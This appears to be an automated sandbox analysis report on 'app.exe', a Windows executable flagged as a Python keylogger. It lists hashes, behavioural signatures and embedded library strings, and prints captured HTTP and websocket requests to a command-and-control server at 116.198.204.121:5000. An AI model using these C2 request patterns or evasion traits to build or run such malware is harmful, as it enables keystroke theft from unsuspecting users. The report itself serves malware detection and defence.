Windows Analysis Report
app.exe

Overview

General Information

Sample name: app.exe
Analysis ID: 1554551
MD5: ee3f845b0064d326c91bc200fe87fa2e
SHA1: e9d99e982eef27dea832f38a3ba8e0b25ff3fc8e
SHA256: 134ef7be21da1bf756cc595ddd67b1caedda2ab4bb200ef9bbec5173aff7ffb1
Tags: exe, windows, user-TheRavenFile
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Python Keylogger
Installs a global keyboard hook
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • app.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\app.exe" MD5: EE3F845B0064D326C91BC200FE87FA2E)
    • app.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\app.exe" MD5: EE3F845B0064D326C91BC200FE87FA2E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: app.exe PID: 4308 | JoeSecurity_PythonKeylogger | Yara detected Python Keylogger | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-12T16:50:19.161491+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.5 | 49708 | TCP
    2024-11-12T16:51:00.524914+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.5 | 64106 | TCP

    Source: app.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: app.exe, 00000000.00000003.2044009957.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: app.exe, 00000000.00000003.2044240662.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291253287.00007FF8B8B24000.00000002.00000001.01000000.0000000C.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_asyncio.pdb source: app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_multiprocessing.pdb source: app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: app.exe, 00000002.00000002.3290821663.00007FF8B7E1D000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: app.exe, 00000000.00000003.2041668057.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291768707.00007FF8B8F89000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: ucrtbase.pdb source: app.exe, 00000002.00000002.3288925159.00007FF8A9351000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: app.exe, 00000000.00000003.2042220965.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: app.exe, 00000000.00000003.2041445729.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291669459.00007FF8B8F75000.00000002.00000001.01000000.0000000F.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb source: app.exe, 00000002.00000002.3290723067.00007FF8B7DF1000.00000002.00000001.01000000.00000013.sdmp
    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: app.exe, 00000000.00000003.2043073708.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: app.exe, 00000000.00000003.2043836755.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_overlapped.pdb source: app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: app.exe, 00000000.00000003.2044345299.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: app.exe, 00000002.00000002.3291871307.00007FF8B93D1000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: app.exe, 00000000.00000003.2041888729.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
    Source: Binary string: p.win-amd64-3.8\Release\_win32sysloader.pdb source: app.exe, 00000000.00000003.2041226515.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: app.exe, 00000000.00000003.2043495149.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291470377.00007FF8B8C15000.00000002.00000001.01000000.00000024.sdmp
    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: app.exe, 00000000.00000003.2042910662.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291372022.00007FF8B8B3E000.00000002.00000001.01000000.0000000B.sdmp
    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: app.exe, 00000000.00000003.2043753016.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291968105.00007FF8B9843000.00000002.00000001.01000000.0000000E.sdmp
    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: app.exe, 00000000.00000003.2041521665.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: vcruntime140.amd64.pdbGCTL source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292106073.00007FF8BA24E000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: app.exe, 00000000.00000003.2042499534.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32pdh.pdb source: win32pdh.pyd.0.dr
    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: app.exe, 00000000.00000003.2041296869.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: app.exe, 00000000.00000003.2041595247.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: app.exe, 00000000.00000003.2043659043.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: app.exe, 00000002.00000002.3288474877.00007FF8A8F03000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292285552.00007FF8BA4F3000.00000002.00000001.01000000.0000000A.sdmp, select.pyd.0.dr
    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: app.exe, 00000000.00000003.2042670052.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
    Source: Binary string: ucrtbase.pdbUGP source: app.exe, 00000002.00000002.3288925159.00007FF8A9351000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: vcruntime140.amd64.pdb source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292106073.00007FF8BA24E000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291470377.00007FF8B8C15000.00000002.00000001.01000000.00000024.sdmp
    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: app.exe, 00000000.00000003.2044637351.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\pyexpat.pdb source: app.exe, 00000002.00000002.3290963193.00007FF8B7E52000.00000002.00000001.01000000.0000000D.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: app.exe, 00000002.00000002.3285964356.00007FF8A80F6000.00000002.00000001.01000000.00000023.sdmp, MSVCP140.dll.0.dr
    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: app.exe, 00000000.00000003.2041817197.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb** source: app.exe, 00000002.00000002.3290723067.00007FF8B7DF1000.00000002.00000001.01000000.00000013.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: app.exe, 00000002.00000002.3285964356.00007FF8A80F6000.00000002.00000001.01000000.00000023.sdmp, MSVCP140.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: app.exe, 00000000.00000003.2042990999.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: app.exe, 00000002.00000002.3288474877.00007FF8A8F03000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: app.exe, 00000000.00000003.2042415024.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: app.exe, 00000000.00000003.2041370917.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: app.exe, 00000002.00000002.3287213051.00007FF8A8713000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: app.exe, 00000000.00000003.2043573928.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: app.exe, 00000002.00000002.3287588669.00007FF8A8B0D000.00000002.00000001.01000000.00000005.sdmp, python38.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291253287.00007FF8B8B24000.00000002.00000001.01000000.0000000C.sdmp
    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: app.exe, 00000000.00000003.2044094725.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: app.exe, 00000000.00000003.2042128630.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: app.exe, 00000000.00000003.2042580638.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: app.exe, 00000000.00000003.2042333645.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: app.exe, 00000000.00000003.2044856644.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_decimal.pdb source: app.exe, 00000002.00000002.3289036482.00007FF8B054D000.00000002.00000001.01000000.00000026.sdmp
    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: app.exe, 00000000.00000003.2042754649.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: app.exe, 00000000.00000003.2043165569.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: app.exe, 00000000.00000003.2042831387.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: app.exe, 00000000.00000003.2041742051.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_elementtree.pdb source: app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: app.exe, 00000000.00000003.2044162437.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: app.exe, 00000000.00000003.2042037638.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_decimal.pdb## source: app.exe, 00000002.00000002.3289036482.00007FF8B054D000.00000002.00000001.01000000.00000026.sdmp
    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: app.exe, 00000000.00000003.2041962953.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: app.exe, 00000002.00000002.3287213051.00007FF8A8713000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3285578905.00007FF8A7FE5000.00000002.00000001.01000000.00000028.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32api.pdb source: win32api.pyd.0.dr
    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: app.exe, 00000000.00000003.2043932736.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: app.exe, 00000000.00000003.2044508949.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE87790 FindFirstFileExW,FindClose,0_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE87790 FindFirstFileExW,FindClose,2_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A80AA260 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,2_2_00007FF8A80AA260

    Networking
    Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 5000
    Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49705
    Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 5000
    Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49706
    Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 5000
    Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49707
    Source: global traffic TCP traffic: 192.168.2.5:49705 -> 116.198.204.121:5000
    Source: global traffic HTTP traffic detected:
        GET /xiewangzhenyan HTTP/1.1
        Upgrade: websocket
        Host: 116.198.204.121:5000
        Origin: http://116.198.204.121:5000
        Sec-WebSocket-Key: ScSGY5QfdPym9roNV3Q5ZA==
        Sec-WebSocket-Version: 13
        Connection: upgrade
    Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49708
    Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:64106
    Source: global traffic HTTP traffic detected:
        GET /102019base HTTP/1.1
        Host: 116.198.204.121:5000
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
        Accept-Encoding: gzip, deflate, br, zstd
        Accept: */*
        Connection: keep-alive
        Authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51w
        Content-Type: application/json;charset=UTF-8
        Referer: https://www.baidu.com/
        Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
    Source: global traffic HTTP traffic detected:
        GET /102019key HTTP/1.1
        Host: 116.198.204.121:5000
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
        Accept-Encoding: gzip, deflate, br, zstd
        Accept: */*
        Connection: keep-alive
        Authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51w
        Content-Type: application/json;charset=UTF-8
        Referer: https://www.baidu.com/
        Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
    Source: unknown TCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: app.exe, 00000002.00000002.3284288598.000002083A8F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.../back.jpeg
    Source: app.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp String found in binary or memory: http://.css
    Source: app.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp String found in binary or memory: http://.jpg
    Source: app.exe, 00000002.00000002.3284661842.000002083AD20000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278039696.0000020832E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://116.198.204.121:5000
    Source: app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://116.198.204.121:5000/102019base
    Source: app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://116.198.204.121:5000/102019base0%
    Source: app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://116.198.204.121:5000/102019key
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.198.204.121:5000c
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp String found in binary or memory: http://arxiv.org/abs/1805.10941.
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
    Source: app.exe, 00000002.00000002.3284418013.000002083AAD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://bugs.python.org/issue23606)
    Source: app.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: app.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: app.exe, 00000002.00000002.3284450216.000002083AB10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
    Source: app.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: http://cffi.readthedocs.org
    Source: app.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: http://cffi.readthedocs.org/
    Source: app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
    Source: app.exe, 00000002.00000003.2088609981.0000020832FD8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
    Source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
